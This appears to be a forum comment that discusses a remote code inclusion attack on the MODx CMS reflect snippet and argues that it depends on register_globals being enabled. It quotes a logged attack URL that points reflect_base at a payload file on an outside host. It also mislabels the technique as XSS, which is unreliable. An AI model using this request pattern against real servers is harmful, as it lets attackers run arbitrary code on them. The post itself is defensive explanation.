Looks to me as if the Secunia advisory is omitting this important point. The hack is a typical XSS (Cross-Site Scripting) attack that attempts to inject an unexpected value into the $reflect_base variable. It does this by passing the value in the query string, which allows the hacker to include a remote file with any code that they want in it which will be executed as if it were on your server (= game over).
The URLs that people are seeing in their logs are like so:
/assets/snippets/reflect/snippet.reflect.php?reflect_base=
http://www.adultfirstdate.com/forum/spider.txt
You can see how $reflect_base is being set to a remote file, which is where the evil code lives.
However, if you do not have register_globals set to ON, then you cannot set $reflect_base from the query string. This same URL would not set the value of $reflect_base on your system, but rather it would be stored as $_GET[’reflect_base’]. So you cannot inject a malicious value into $reflect_base from the query string unless register_globals is set to ON.
MODx will complain loudly after installation and every time that you log into the Manager if you leave register_globals set to ON
[admin: corrected "off" to "on"], so to me it doesn’t really seem correct to cite this as a MODx vulnerability per se. You would need to ignore these warnings for this attack to work. Your installation would also be vulnerable to hackers if you ignore the warnings to remove write permissions from your config file or delete the install directory after installation, so the only difference in this case is that the specific file being exploited (the reflect snippet code) wasn’t previously flagged as a potential vector for attack (although the general doorway through which the attacker entered was).